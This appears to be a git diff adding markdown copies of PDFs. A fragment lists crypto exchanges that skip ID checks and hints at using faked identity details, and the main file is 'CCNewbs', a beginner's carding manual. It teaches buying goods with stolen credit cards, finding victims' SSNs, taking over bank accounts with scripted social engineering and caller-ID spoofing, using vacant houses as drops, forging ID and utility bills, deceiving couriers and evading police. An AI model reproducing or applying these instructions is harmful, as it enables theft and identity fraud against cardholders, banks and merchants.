almost instantly. +How to buy Bitcoins with Switchere? +The interface of Switchere is user-friendly so the process is time-effective and simple and +explained below. +If you want to buy cryptocurrencies such as Bitcoin, Ethereum or Litecoin Switchere.com, +needs to be opened and the ‘Buy Crypto’ button has to be selected. +The order form is to be selected, and the amount of Euro for purchase has to be entered. It +automatically counts the amount of crypto that will be received. +Upon this, the email and wallet address has to be entered. The user must accept and agree +with the Terms of Use and Privacy Policy and continue. +On the payment page the bank card details have to be entered and then the user can pay the +respective amount. Upon payment, coins are directly sent to the user’s wallet. +Privacy – Take Note +There is no registration or verification that is required for purchases up to 100 EU,R after +which, the amount of the maximum purchase limit depends on the verification status of the +user. This why it is featured as the best exchange to buy bitcoin without verification. +• Confirmation of phone and email increases the maximum amount by €500 (You can use the +gvoice or the site I Gave above). +• Verification of identity and bank card raises the maximum purchase limit by €1,000. +• The verified address allows buying up to €5,000. + +• Verified proof of income makes crypto purchases unlimited. +GET STARTED WITH SWITCH HERE +2. LocalBitcoins +As mentioned above, this site is more of a marketplace than being called as an exchange. +LocalBitcoins, a peer-to-peer platform was established in the year 2012 and serves its users +across the globe. The site acts as an excellent escrow system by integrating traders to meet +and trade along with online trading. +Payment methods +LocalBitcoins supports various payment methods such as cash on delivery, cash through the +mail, PayPal, WebMoney, Western Union and Wire exchange. +How to buy Bitcoins with LocalBitcoins? +LocalBitcoins is a decentralized exchange, where users can trade in-person and the site acts +as an escrow system. New users who want to get started can register an account on this site +by clicking on the sign-up option. Once the account is created (as a buyer), the user can start +searching for a seller to buy Bitcoins. Even some advertisement of the sellers with their offers +will also be displayed on the site. +The buyer can choose an appropriate seller from the list of sellers appeared on the site. After +choosing an appropriate seller, the buyer has to enter the amount to buy Bitcoins as well as a +payment method. At last, the buyer can complete the process by clicking on “Buy” option. +A user has to check the feedback section in seller’s profile before buying Bitcoins. +Privacy +The site upholds the anonymous nature of Bitcoins and does not ask for any verification +details. However, some users might ask for your ID proof as per KYC and AML regulations. +Also you have until about $1,500 before they ask for verification. +GET STARTED WITH LOCALBIT COINS +3. Bitquick + +You should definitely consider Bitquick if you are willing to buy Bitcoins with cash deposits +without submitting any ID proof. Bitquick acts as an excellent escrow system launched in the +year 2013 and operates in 49 US states by supporting three fiat currencies (US dollars, +Canadian dollars, Euros). +Payment methods +Bitquick supports Bank Transfers, Western Union, MoneyGram and carries out all its +transactions using cash deposits. +How to buy Bitcoins with Bitquick? +As you know, the site offers buying Bitcoins with cash deposits and buyers can get their +Bitcoins without even meeting the seller. The process to buy Bitcoins is simple. +You can directly head towards buying Bitcoins without registering to the site. The first step is +to enter the approximate amount that you are ready to spend on Bitcoins. Next, select the +desired order from the order book and enter your email address along with your Bitcoin +wallet address. +You will receive an email that will contain a link (save the email). later, head towards the +bank and deposit the amount into the account number present in the order confirmation page. +Next, click a picture of the receipt provided by the bank to the link sent in the email. +Once the receipt is received by the seller, you Bitcoins will be released from the escrow and +will be delivered to you within 3 hours. +Privacy +Users are not asked to submit any ID proof for trading. Instead, a PIN is created by the seller +which allows them to accept, modify or cancel the order.Buyers might be asked to update a +photo ID. +GET STARTED WITH BITQ UICK +4. Wall of coins +Wall of coins offers a hassle-free process to buy Bitcoins by supporting only cash as a +payment method. It is a newly established peer-to-peer exchange based in Florida. +Payment Methods +Wall of coins accepts three payment methods to buy Bitcoins that include, MoneyGram +deposits, cash deposits at various bank branches and Bank of America’s Teller Assist. + +How to buy Bitcoins with Wall of coins? +Well, Wall of coins offers complete privacy to its users. As a buyer, it is not even required to +register your account on this site to buy Bitcoins. You can directly pay for your Bitcoins by +depositing cash into the seller’s account. The process is simple and is explained below. +At first, you have to enter the dollar amount that you are ready to spend on Bitcoins. A list of +banks and their branches near you will be displayed once you enter the amount. You have to +opt for a bank of your choice and deposit the money into the seller’s account. Once you +deposit the cash, text Wall of coins with the proper code. The seller confirms the payment +and the Bitcoins are delivered to you within 15 minutes. +Privacy +Wall of coins does not ask for any ID proof. You can directly buy Bitcoins without even +registering to the site. +GET STARTED WITH WALL OF COINS +5. Coinmama +Coinmama is a credible option even though the site requires some level of verification. The +site was launched in the year 2013 and serves over 219 countries and the majority of US +states. The site has not yet implemented its wallet and hence Bitcoins are stored in the +address provided by you. +Payment methods +Currently, Coinmama supports only credit/debit card payment to buy Bitcoins. They have +SEPA transfers, which allows you to transfer money from your bank account (Europe). This +addition makes coinmama the go-to exchange in Europe. +How to buy Bitcoins with Coinmama? +The process to buy Bitcoins via Coinmama is explained below. +Creating an account on this site is quite simple. verifying your email address is the only +criteria to get registered on the site. Next, log in to your account, where you can see a page +asking for some details. Once you enter and save your details, you can see an option called +“Buy Bitcoin” on the navigation bar. + +Click on the tab and choose the number of Bitcoins you want to buy. Then, you are asked to +select a mode of payment. you can select any mode as per your convenience. If opt for a +credit card as a payment mode then the process is simple as well. +After selecting credit card as a payment method, add your Bitcoin wallet address and hence +you will be asked to enter your Billing information and address. Next, you have to enter your +credit card information. You will be asked to verify your phone number and email by sending +a 4-digit PIN via SMS. Next step is to upload your ID proof. +Please note that you may have to complete a certain level of verification depending on the +number of bitcoins you want to buy, the info about which is given below. +Privacy +As mentioned above, Coinmama does not ask any ID verification for transactions up to $150. +However, for the users who are willing to buy Bitcoins more than $150 can refer the process +below. +Level ze r–o You are asked to update your phone number, ZIP code, state, and city to spend +up to $150 on Bitcoin. (This you can easily get from spamming) +Level on –e you are asked to submit your ID or Driver’s license to spend up to $10,000 on +Bitcoin. (This you can also easily get from spamming) +Level tw –o You are asked to submit your government issued ID proof along with other ID +proofs. users can also submit their submit their passports and hence are open for spending +$50,000 on Bitcoin. (This you can easily get from spamming) +Level thr e– eThis is the highest level of verification, where the user has to update face-to- +face recognition approved by a notary or a lawyer and then you can spend up to $1,000,000 +on Bitcoin. +GET STARTED WITH COIN M AMA +Also Check out this link +https://damecoins.com/buy-btc/with- +credit-card-in-usd diff --git a/CCNewbs_pdf.md b/CCNewbs_pdf.md new file mode 100644 index 0000000..5bf1c50 --- /dev/null +++ b/CCNewbs_pdf.md @@ -0,0 +1,1058 @@ +# CCNewbs + + +--- + +Complete Guide to Carding for Newbs. Learn to +Card. +­By Sacky +VIRTUAL CARDING +This chapter is about virtual carding. Virtual carding is the art of ordering goods online using +stolen credit cards, also known as “CVV”, “pizza”, "FULLZ", any any other names the +members of the community use +to disguise their intentions. Although this seems easy, there are many pitfalls you might want +to be aware of when doing that, especially since merchants are getting more and more aware +of online fraud. Want to know how to get free goods? Let's get started! +HOW IT WORKS +The first thing is to ask yourself, how much do you want to card, and what do you want to +card? Then, you will have to pick one of those 3 levels. Each level represents a difficulty level +and you will see the prerequisites. +Level 1: Easy carding +This level is used for very easy things to card, for example restaurants and small phone +orders, mostly under $50. This is the entry point of most carders. For that, you will need: +1. Credit card number. +2. Expiration date. +Level 2: Intermediate carding +This level is used for online transactions that are slighly higher, like background reports, or a +very +small physical item. You will need: +1. Credit card number +2. Expiration date +3. CCV code +4. Cardholder name +5. Full billing address +6. Sometimes, phone number of the account + +Level 3: Hard carding +This is not recommenced for beginning carders. Here we are talking about everything above +level 2, such as large physical items, or high­security websites like Newegg, TigerDirect, and +sites that require Account Take­Over (for ATO, see section 1.2 of this guide). Computer parts, +electonics, and many other items fall in this level. You need: +1. Credit card number +2. Expiration date +3. CCV code +4. Cardholder name +5. Full billing address +6. Phone numbers +7. SSN +8. DOB +9. Recommended, background report (optional) +If you are aiming for level 1 carding, you just need to call for pizza and order pizza to another +address, no need to write lengthy paragraphs on this one. This is easy and is pretty +straightfordward. +If you are aiming for level 2, you can card background reports or small physical items, mostly +under $150. All orders are done online, and you will have to enter the correct billing address, +shipping address, and card information. +Now, you must see if the websites says billing phone number on file with the bank, or simply +contact phone number. If the website asks for billing phone number, you have to put the +phone number on file with the bank for the cardholder, otherwise it is safe to put your burner +phone number. Now, is the website going to call you? It depends on the order, their policy and +their +suspicion about you, so there's no safe answer to this question. Remember that carding is +often trial and error. +When you use a card to hit a website, do not hit another website using the same card until +your order has shipped. Making an order go though and having a charge approval is easy, but +getting it shipped is often where the challenge lies. +A level 2 site that is often carded is peoplefinders.com. This is where carders get most of their +background reports. It is a good playground to test your skills, and will prove useful later. +Now, on to level 3. You probably saw the information required, now how to get it? First, if your +subject is aged under 40, chances are that you are out of luck. Otherwise, read on. + +First, you need to get the right type of card. This is called finding the right BIN (Bank +Identification Number). The BIN is the first 6 digits on the card and is used to identify the card +type as well as the issuing bank. To learn more, go to bindb.com, at the top go on Bin Search, +and enter the first 6 digits of the card. They will tell you the issuing bank, and card type. You +have debit and credit cards, and the card type can vary. From the weakest to the strongest, +they are: +● Secured: Very low limits, sometimes around $300 +● Classic: Low limits, sometimes around $1000 +● Gold: Average limits, can be around $3000 +● Platinum: High limits, can be around $8000 +● Business: Very high limits, in the 5 digits, often around $15,000 +● Signature: The best ones, I got cards that had $30,000 of credit limit +Note that those numbers are subject to change according to the cardholder's credit score, +history, and spending patterns. For the benefit of this guide, we will only work with credit +cards. By experience, debit cards often do not have funds, and have tighter security for online +purchases. In other words, they are rubbish for level 3 carding, but may have other uses, like +level 1 or level 2 purchases. +Register an account on any SSN finder site such as ssnfinder.ru or ssndob.cc and look for +your subject. At the same time, go on peoplefinders.com and get the full background report of +your subject using a level 2 card. Once you have the background report, look if the addresses +and date of birth match on the report and on backstab. If everything matches, you can +assume the SSN will be correct. Use your common sense to compare the backstab and +peoplefinders results to make sure you didn't get the wrong information. About 80% of the +subjects over 40 years old can be found. +You have the SSN and DOB? Great! Now, time to get the mother maiden name. This is +slightly harder and will work if your victim is in one of those states: Arizona, California, +Delaware, Idaho, Indiana, Kentucky, Maine, Maryland, Massachussetts, Minnesota, Nevada, +New Hampshire, New Jersey, Ohio, Rhode Island, South Dakota, Texas. Go on archives.com +and card an account, then look for your subject's mother (look at the background report for +her name and date of birth), and try to look for her birth record. This is a trial and error case +and works about 50% of the time. + +Why get all this information? Because many level 3 sites will have either VBV (Verified by +Visa) or MCSC (MasterCard Secure Code) protection during checkout. This is a form that is +presented by the issuing bank of the credit card and asks for additional questions. +Although every type of card is different, the commonly asked questions are: +1. Date of Birth +2. Last 4 digits of SSN +3. Full name on card +4. Billing zip code +If you fail any of those questions, the order will not go through. Now, why did we need all this +information? Because we will perform a ATO on the account. This is tricky. Read the next +section for a detailed description of Account Take­Over fraud. +ACCOUNT TAKE-OVER FRAUD (ATO) +Do you dream of carding thousands of dollars worth of computer hardware on Newegg? It's +doable, but not easy. You have to follow the right steps. I carded a $10,000 gaming rig in +under 2 weeks using platinum cards by following that guide, so I'm in position to tell you how. +First thing, check the balance of your credit card. Now, before going crazy, remember this rule +of thumb: Do not use card checkers! They burn the card very quick. Let me explain. +Every transaction automatically gets a fraud score between 0 and 999. The system used to +evaluate transactions is the same used by the big 4 banks and is called Fair Issac. +Transactions having a fraud score over 300 will hit manual review by an agent, who will +decide if they contact the cardholder or just let it though. Scores over 500 with auto­decline, +block the card, and an agent will contact the cardholder. Some banks have different criterias, +but things that can affect the fraud score are: +1. Comparison with the usual spending pattern of the cardholder +2. Location of the charge +3. Amount +4. Risk factor of the associated merchant + +For example, a $20 charge in the cardholder's local Walmart will not trigger anything, but a +large purchase of $2000 on Newegg.com will have a high fraud score and probably +auto­decline if the cardholder rarely makes online purchases. +So how is this relevant? A small card­not­present charge followed by a big charge will make +the fraud score very high, because they assume you are testing the card. If they see a small +$1 charge, then a few minutes later a large purchase online, they will auto­decline the card +and your plan will likely fail. +There are much better ways to check if a card works. The best way is to call the bank's +toll­free number and use the automated prompts. This brings no danger, however use +Spooftel to spoof your number to display the cardholder's number. Once you do that, you are +ready to call the issuing bank's number and check how much is left on the card. Let's get to it. +Call the bank using your burner phone and have in hand the following information, according +to the bank. The automated prompt will give you access to the transaction list, balance, and a +few other options. +If, for any bank, you enter the card number and the system immediately transfers you to an +agent without additional questions, it means the account is closed and the card is burnt. No +need to waste time on this one, just hang up and use another card. The agent will only tell you +the same thing, and you will look dumb. +It's always a good practice to take note of the last transactions and amounts, just in case you +get asked for them later. Listen to them and write them down, I recommend up to 8 +transactions for maximum safety. +So you have the balance and the available credit line now. Nice! So you know how much you +can spend online. Before you go crazy though, there is one more obstacle you need to be +aware of: many sites like Newegg or TigerDirect refuse to ship to an address that is not on file +with the bank. And chances are that your cardholder does not reside at your drop address. +Here is how we will solve this problem, introducing the Account Take­Over fraud, also known +as ATO. +ATO is the process in which a fraudster (you) calls the bank to make whatever changes he +wants to the account, without the cardholder knowing. This involves speaking with a customer +service agent and using social engineering. Before you even think about pressing 0 to speak +to an agent, make sure you have, at the very least, the following information in hand: +1. Full card number, expiration date, CCV code +2. Full billing address of the cardholder (and county) + +3. Date of birth (and write down the age too, not just the DOB) +4. SSN +5. MMN (Mother Maiden Name) +6. Employer name (facultative, if possible, try to find it on Facebook) +7. Car make and model (facultative, if possible, try to do a Google StreetView on the +CH's house) +8. House size and value (facultative, if possible find it in realestate.com as this is public +information) +9. Driver's license number, expiration, state (facultative) +10.Previous addresses +11.Background report +In case you do not have the MMN, try to guess using common last names in the background +report. If you really cannot find it, sometimes it is possible to get around it with other +questions. Once you have this information in hand, study it, try to remember it. Remember, +you are the cardholder, the card is yours, and you are confident, just like when you call your +own bank for a legitimate request. +When you call the bank, you will be usually asked for 3 security tokens. Those tokens can be, +but are not limited to: DOB, SSN, Address, CCV code, cellphone, MMN. If you fail 1 token, +you will be asked 2 more. At this point, 2 things can happen: +1. You did it correctly, so the agent will listen to you and will do whatever request you +have to do +2. on the CH's account, and no flags will be raised.The agent suspects an ATO is +occuring, and transfers you do the securiy department. This is called the Verid +department, and you will be asked 2 OoW (Out of Wallet) questions. Those are +multiple­choice questions based on the cardholder's credit history and public records. +They can be easy or tricks, it's random every time it happens. If you fail those, they will +tell you that they can't help you and will suggest you show up in person at your bank. +They will also ring the cardholder. So if you fail this one, forget this card, it's burnt to a +crisp. +The first thing you want to do on the account is change the billing phone number. Only that. +Do nothing else, as making too many changes will raise a red flag on the account. Call to +change the main billing number and let the card sit still for at least 5 days. +All right, are you ready? Relax, sit in your favorite couch, call the bank, listen to the prompts, +and press 0. The message goes on, this call may be recorded for quality purposes. + +This is the first example, if you have the correct MMN (this is the most frequently asked +token). +Agent: Thank you for calling Chase, my name is Bob, who am I speaking with? +You: James R Layton. +Agent: Thank you mister Latyon, and for security purposes, may I have the mother's maiden +name on the account? +You: Lucile. +Agent: Thank you, and what is your date of birth? +You: October 1st, 1965. +Agent: Thank you mister Layton, what can I do for you today? +This is the second example, if you do not have the MMN. Guess it, and do not hesitate. You +know yourself better than the agent does, and they can only rely on the information they have +on their screen to validate your answers. +Agent: Thank you for calling Chase, my name is Bob, who am I speaking with? +You: James R Layton. +Agent: Thank you mister Latyon, and for security purposes, may I have the mother's maiden +name on the account? +You: Smith. +Agent: I actually have something different here, it starts with C. +You: With C? It's impossible! Her name was Lucy Smith, she never used any other name! +Agent: Well, you do not have any other name that might start with C? (if you have a last name +starting with C on the background report) +You: My aunt's maiden name is Charlotte, but I doubt that's the answer you have on file. (if +you have nothing like that on the report) +You: No, no one in my family uses such a name. +Agent: Oh well, let me take note of this for you, can you confirm the last 4 digits of your social +security number? +You: 4456. +Agent: Thank you, and what is your date of birth? + +You: October 1st, 1965. +Agent: And you billing address with the zip code? +You: 123 Fake Street, Fakeville, NY, 10008. +Agent: Thank you Mr. Layton, how can I help you today? +If you hear that, it means you got in. Otherwise, you will be transferred to the security +department for the multiple­choice questions, have your report in hand. If you fail, the card is +dead. Make sure you spoofed the cardholder's number, otherwise you could be asked for +other questions like driver's license number, vehicule plate number, etc. Those are questions +you probably do not have the answer to. +Now, what you want to do is change the billing phone number. A sample dialog with the agent +can go as follow. +You: I would like to change my phone number. This phone will be disconnected tomorrow and +I want to give you my new primary number so you can reach me if there is something. +Agent: Okay I see, what is the number? +You: 234­567­8901. +Agent: Thank you, is there something else I can do for you? +You: No thanks. +Agent: Thank you for calling Chase, have a wonderful night. +Once you passed the verification part, the rest is pretty straightforward and is relaxing. Now +that you changed the billing number, let the card rest for at least 5 days. Do not make any +transaction. The cardholder will continue to use his card normally too. During your call, at the +end, if you failed the MMN question, you might want to remind the agent to change the MMN +on file to avoid problems next time you call. +Also take note, at any point, if the agent wants to put you on hold, or says he needs to verify +something and will be back, wait for him to put you on hold, and hang up. It basically means +they are going to ring the cardholder. If this happens, you might want to wait at least 48 hours +before calling again, and you will see just by the automated prompts if the card is burnt or not. +Maybe they did not call the cardholder, but in 90% of the cases, they did. It happens, +especially with Citibank, who likes to replace the Verid questions by a quick ring to the +cardholder. + +The questions often change when you call, but they always follow a certain pattern. By +experience, I will give you the tokens usually asked by the big 4 banks, but we aware that +they might change, or they might ask you other questions if they believe you are bogus. They +can ask for your age to throw you off, as you might not have to calculate it fast enough using +the DOB. If you fail this verification, you will be transferred to Verid department. +Since you have to wait 5 days, it's a good idea to create an account on your target website, +browse the items, put some in your cart, go to checkout, go back, remove items, read +descriptions. Just try to appear like a legitimate shopper. Remember that $1000 is a lot of +money for the average American and if you show you don't care about your money and just +throw items in your cart, you raise flags. Look like you care about how much it costs. +There is also a technique that works well with Citibank: when you are asked for the MMN by +the automated system, if you fail, you will hear “the agent might need to ask you verification +questions”, and if you succeed, you will be connected and everything will be a breeze. When +the automated system asks you for the password, say “Jope” while putting a high tone on the +O sound, then slightly lower your pitch. Say the word at normal speed, like when you are +talking to someone. This will trick the automated system into beleiving that you got it right. +You might have to retry 2­3 times for it to work, but I got it with almost all my accounts. This +will save you a lot of hassle with the agent and will make the call extremely easy. +Once you got rid of this verification process, it will be easier next time you call the bank for +this account. So let's suppose you followed me and let it sit for 5 days. Call again, and this +time, we will add a temporary shipping address to the account. A transcript can go as follow: +(pass verification questions) You: I want to make a purchase from Newegg.com but they ask +me to add a temporary shipping +address on file. I'm not sure how that works, do I just tell you where I want them to send my +order? +Agent: Let me help you with that, we can add an alternate address on the account, what +would be the address? +You: 123 Fraud Street, Cardingville, CA, 98765. +Agent: No problem mister Layton, I have notated the account for you, is there something else +I can assist you with today? +You: No thank you +Agent: Have a good afternoon. + +Almost all banks allow that, except Bank of America, who can only change the mailing +address. That's why their cards are not the best when it comes to level 3 carding, but some +stores will do a conference call with the bank to bypass this restriction. Chase works the best +for temporary shipping addresses, but is hard to ATO. It all depends on your skills and what +you're comfortable with. All US banks accept a Canadian address, and some banks may +accept an international address. +Once you have added the alternate address in the account, it's time to make the hit. Take +your account on the website you want to card, shop a little bit again, then proceed to +checkout. Try not to go over $2000 per order. Enter the correct billing address, double­check +the information. Enter the billing phone number (the one you added on the file at the bank), +then your shipping address. Triple­check all the information for accuracy. +Then, send the order. You might be greeted by a VBV or MCSC form, but if you have the +required information, it should not be a problem. Enter the information they want to get, and +submit the order. Also, some websites like TigerDirect will ask you for your DOB and will give +you 3 verification questions to answer. Those are public records and can easily be found in +your background report, so don't be scared. If you fail 1 question, you will be asked an +additional question. If you fail 2 or more, the order will be put “on hold” and things will get +harder, so try not to fail. +At this point, 2 things can happen when you submit the order. It depends on the spending +habits of the cardholder, and will make things easier or harder for you. +1. The order goes through without any problem, and becomes “pending” status. +2. The transaction get declined and the website says to call the issuing bank. If this +happens, call the bank, the system will act like the card is burnt (transfer without any +additional questions), and a fraud agent will answer. Remember, the card is yours, tell +them you authorized the transaction, but you don't know why it's declined. It's usually +easy if you have the correct information, but if you ATO'd the account before, chances +are that you have everything it takes. When the agent tells you you are all set, resend +the order on the website. Call as soon as you get the decline, don't wait, otherwise the +real cardholder will get a call you don't want him to get. + +All right, the order is now sent and the status is “pending”. The next section will tell you why +some orders get canceled (newbie mistakes), and why in your case everything should be all +right. Take a deep breath and hop to the next section. +WHY ORDERS GET CANCELED +When a website receives an order of about $1000, we understand that they try to protect +themselves. What is the first thing that a website will do to verify the order? That's right, they +will call the issuing bank and will check if the billing phone number you entered is correct, +otherwise they will ask for it, and will ring it. You can receive the call, or the cardholder will, +depending if you ATO'd the account correctly. +This is why orders get canceled when newbies enter a credit card order and expect to receive +a free iPhone from the Apple store. They are not fools and want to protect themselves. +However, if you took care of changing the billing number on file, you will get the call and you +will be able to confirm the order. +Not so fast, a call is not simply “is everything okay?”, but rather a verification call where they +want to see if you are really the cardholder or not. They sometimes ask you for verification +questions similar to Verid questions, but all the questions are taken from public reports. They +can also ask you if you put the shipping address on file with the bank (you hopefully did), and +they will call the bank to verify. Also, in some rare cases, they can make a conference call +with you and the bank, but you will be asked for the usual questions, which means last 4 of +SSN, DOB, last transactions, etc. +If you are a newbie and just put some credit card information on a website hoping to get a free +iPhone, you will just see the order passing to Canceled state without any details and you will +not even get a call. This is the reason why people post threads about “carding does not work” +and get the same answers. +If you passed the verification call, the representative will tell you that everything is okay and +that they will have the order shipped out today. This is good news! At this stage, I received +100% of my items, I never had problems past the verification stage. Now you may be tempted +to hit another site; resist to the temptation. You ATO'd card can almost be considered a level +4 card, at you own the account and can do whatever you want, so it has a high sentimental + +value. Wait for the order to ship and the package to leave the merchant before you hit another +webstore. +I recommend carding in the morning, to avoid letting a charge sit on the card for too long. You +never know how often a cardholder checks his statement online. I had cards that died within +hours, and other ones lasted 3 months. Once the package is shipped, you can card another +store, no need to call the bank, as your drop address is already on file. Repeat until the card +is burnt. Once it is burnt, never show your face at the drop again. The alternate address is on +the bank's records and they can send Law Enforcement to this place. A drop is like a condom, +use it once, do all your business, and trash it, because it becomes dirty. +Another verification step they can take is send you an e­mail asking for scans of your ID +documents, such as passport and driver's license. These can easily be photoshopped and +there are templates available everywhere. Utility bills are pretty easy to forge too, so don't +worry about this part. Do what you have to do, but be quick. +Another step you can take, is to put the shipping name on the package to a family member of +yours, for example if the cardholder's name is James Latyon, send the package to a certain +Harry Layton (find a name that's on the report and have their DOB, in case) and say you are +sending the package to your son / brother / whatever relationship you have on your report. +Also, keep in mind that no method is perfect, and the website can cancel the order simply +because they feel it is not safe to process it. Nothing is perfect, but if you ATO'd the account +successfully, it should be easy. Remember to stay under $2000 per order. You never know +what other tricks they may use to catch you. +Always choose the fastest shipping method. Some say it raises flags, but if you did everything +else correctly, that will not be the reason why your order fails. Besides, it greatly reduces your +chances of getting an intercepted package, which is a pain in the ass and makes your efforts +worthless. +This brings me to the topic of finding a drop to ship your order to. You can ship it to your +house without any problem, if you want the police to knock at your door and make you ride +dirty to the police station, and get in a steaming pile of shit of trouble. So read on to find out +how to ship your order safely. + +DROPS +A “drop” is a place, or location, where you have illegal, carded, or stolen goods shipped to. It +has to be a place that has no link with your current life and is in no way linked to you. +Finding a drop is not really hard. You can go on Craigslist and find houses for rent, or just +drive around your neighborhood looking for houses for sale where you can ship goods to. +Make sure the house has no big windows that allow the driver to see that the house is empty. +You don't want to have the package returned to the sender because of that. Just use your +brain to find a decent house that you think is worth shipping a package to. Usually pick a town +close to yours, but not in your neighborhood. +The big day has come: UPS tracking shows “Out for Delivery”. Yeah! Now check if the +package requires a signature. All carriers require it, except UPS. For UPS, you can see if +Signature Required is written on your tracking page. If nothing mentions a signature, or if you +are not sure, then signature is not required. +Method 1: Acting like you are away +If you don't need a signature, you can leave a note on the door, “we are away, please leave +package here, take this as my signature” and you might as well print the order confirmation +page showing the tracking number and put it with your note to make your case stronger. The +driver makes the final decision about leaving the package or not, but usually there is no +problem with UPS when they don't need signature. Sign the note, put the order confirmation +page with it, stick it in the door, and wait in your car not far from the place. When the driver +leaves the place, grab the package, and put it in your car. Then skip method 2, and continue +reading. +Method 2: Acting like you own the place +The second method is when a signature is required. You will have to meet face to face with +the driver. Remember one thing, you can relax. The driver's job is not to investigate fraud, but +only to make sure the package does to the right received. So you must just make him believe +the package is yours, they don't care about fraud (but don't be stupid and talk about your +crime). Carry a printout of the order confirmation page, the tracking number open on your +smartphone (use VPN!), and look like you've been waiting for him. You might wait at the drop, +sitting on the front lawn, or doing whatever you want. However keep in mind that waiting in the + +car when the driver sees you get out of the car is highly suspicious. If you choose to wait at +the drop while being visible, take down any “for sale” or “for rent” signs, and call the bank's +automated system prior to showing up to ensure the card is still valid and the police is not +waiting for you. Greet the driver, show papers, sign the cardholder's name, and proceed to +the next section. +Sometimes, the driver might get cocky and ask, why your name is not the same one than +what's written on the package, or why you're not inside. You can tell that you recently moved, +and you put it under someone else's name because you have “problems with customs”. When +they get cocky, you can threat them to make a complaint at their local UPS hub, they usually +calm down and hand over the package. I had a cocky driver in my last carding trip in +Minnesota, and I had to use this method, and I finally got my package. +By experience, when you have brokerage fees to pay (like international package), you can +call UPS before getting the order and ask the amount. Leave a money order on the door and +the driver will take it and leave the package. You will avoid getting a InfoNotice that way, and +the driver will believe you own the place. I did that a lot of times and no failure so far. +Picking your package at the UPS facility +In some unfortunate circumstances, the package can end up at the local UPS facility and will +require government­issued ID to be picked up. This happens if you missed your drop, for +example. In that case, don't bother making a fake ID, as there is a better trick. +The package is usually held for 5 business days before it is sent back to the sender. The day +the package arrives at the facility is day 0. Two scenarios can happen: +Scenario 1: You get a call from the UPS branch +They will probably call you and say something along the lines of, we have a package for +James Fakename waiting at the facility for pickup. Just tell them that you don't know this +person. Here's a sample script of what it should look like: +UPS: Hello, may I talk to James Fakename please? +You: I think you may have the wrong number, who is speaking? +UPS: This is the UPS branch, we called the phone number we had on the package. +You: Oh, I was waiting for a package too, and it didn't get delivered. Is this a package from +Newegg, a smal box? + +UPS: Yes, we have one small box waiting here, for James Fakename. +You: I have a tracking number, can you check if the last 4 digits are 3382? +UPS: Yes they are. +You: I'm very surprised, because my name is Fake Name and I was waiting for this one. I +have no idea who James Fakename is. They looked confused when I placed the order too. +UPS: Well, the package will be sitting here, just come pick it up when you are ready. +This worked me twice. I had 2 drops to watch at the same time and I missed one package. +This allowed me to pick it up. +Scenario 2: You do not get a call +On the morning of day 5, call the toll­free number and ask to be transferred to the local +branch. You can do the same scenario, and inquire about a package waiting there for you. +You must look confused a bit in your voice and look like someone who was victim of a +mistake from the online store, and they will gladly hand over the package to you. Everytime I +did it, I never got asked for any form id ID and it was all smooth. +Do not give your real name. Test the card before going (call the bank), and only do it if the +card is still live, otherwise it can be dangerous. You can also send a mule if you are too afraid, +but I showed my face a few times when the card was still live and never ran into issues. +After getting your package +I sometimes skip this part when I am lazy, but you should be extra careful. Your freedom has +no price tag, so take 5 more minutes to do this precaution. +Drive to a nearby park or public place, and open the cardboard packaging. Look for any +device that may be tracking your position, such as bugs, GPS devices, etc. Then destroy the +shipping label (you can burn it to make sure), throw the cardboard packaging away, and you +now have in your hands a precious item you carded using your ATOd card. Also burn the +order confirmation page if you decided to go this route and you brought it to the drop! At this +point, you can consider your carding heist a “success”! Drive home, relax, you owned the +bank and the website. +If the card is still valid and there was no tracking device, you can card to the same drop again +until the card burns. Get as much as you can out of it. Burn the card to a crisp. I remember + +getting $10,000 worth of electronics on a Chase card at the same drop, split on 5 orders. This +was a money­making week. +All right, you carded the item, ATO'd the account, got items, more items, burnt that drop to a +crisp too, now the card is dead... either over the credit limit, or flagged by the cardholder. +Never show your face to that drop again, and enjoy your goods! +What happens after? Read on to find out. +CHARGEBACKS +A recurring question is, when the card is declared stolen and the transaction is disputed +because of fraud, who takes the hit? +In the case of a card­present transaction using chip & PIN in countries where they use that +technology, the bank takes the hit when the transaction is declared fraudulent. +In all other cases, it's the unfortunate merchant that takes the entire loss. So if you card +Newegg for $2000, they pay about $1600 for the merchandise that they send you, and they +are short the money because you carded them, so they have to make 6 similar big orders +without problems to cover that loss. You now undertand why they make verifications and don't +want to be carded. +Some big merchants like TigerDirect and Newegg will just eat the loss and assume that they +failed at fraud detection, but smaller merchants will make a formal complaint at their police +department. Now, is the police going to investigate? It depends. +If a merchant reports a $200 loss for an order shipped out of state using a stolen credit card, +there is a 99% chance that the police will not even open an investigation for that. However if +they report a $3000 loss using a stolen card from the same state and shipped in a nearby city, +LE (Law Enforcement) might move for that. + +It also depends on the volume of complaints, the amount of loss compared to the size of the +city, and whether there is an obvious pattern between fraud complaints or not. You should try +to make your orders not linkable to each other, and use your common sense to avoid creating +a pattern that might trigger an investigation. +It also depends if the cardholder himself decides to make a complaint or not. As long as they +get refunded by their bank (which they do), chances are that they will not care and just forget +all that. But some more mad people can decide to make a police report for identity theft. +Again, there will be an investigation if there is an obvious pattern. It all depends which city you +are talking about. +So remember, when you card a website, they take the loss in case of a chargeback, so they +want to protect themselves. You have to be smart and ask yourself, if I were in the shoes of +the website owner, how would I catch fraudsters? +Sometimes, you might receive an e­mail from the store asking you to provide more +information about the chargeback, such as authorization forms or documents. Just ignore that +e­mail. Do not become cocky and answer “I got you!” because it could be the difference +between an investigation or not. Keep it dead. +WARRANTY FRAUD +A very fun type of virtual carding is warranty fraud. I got some $1000 CPUs from Intel and +motherboards from ASUS using that trick. Here's how it works. +Many companies, especially electronics, offer what is called “advance RMA”. This is a type of +warranty replacement where the company sends you the new product first, along with a return +box for you to return the defective item to them. They sometimes ask for a credit card number +in order to make sure you will return the defevtive item. This is where we can take advantage +of the system. +It works will Dell, Intel and ASUS, perhaps a lot of other ones, but they are the ones I have +experience with so far. You can PM sellers on eBay to ask for serial numbers of products, or +you can simply card a product and request a RMA using its serial number. Call the +manufacturer, say that your product is defective (use a diagnostic that makes sure it's really +this product that is faulty, such as “the video card shows nothing on the screen, I tried 2 +screens, but it works with other video cards”, and ask if they offer advance RMA, they mostly + +will. Use a level 2 card and have it shipped to your drop address. If they ask why, just tell +them you are on vacation there and your computer broke. +When you receive it, take the package, and disappear. You just got more free stuff using a +credit card that will eventually, maybe, get a chargeback, but you get the point. +For Intel, they ask for the 5 lines of text on the CPU itself, and a credit card for hold, so you +need to have the unit in your hands for it to work. +For ASUS, the serial number is enough, they require a credit card. +For Dell, it's the easiest, no credit card needed, just order your free item on the phone without +credit card, you just need a name and an address. +Feel free to discover 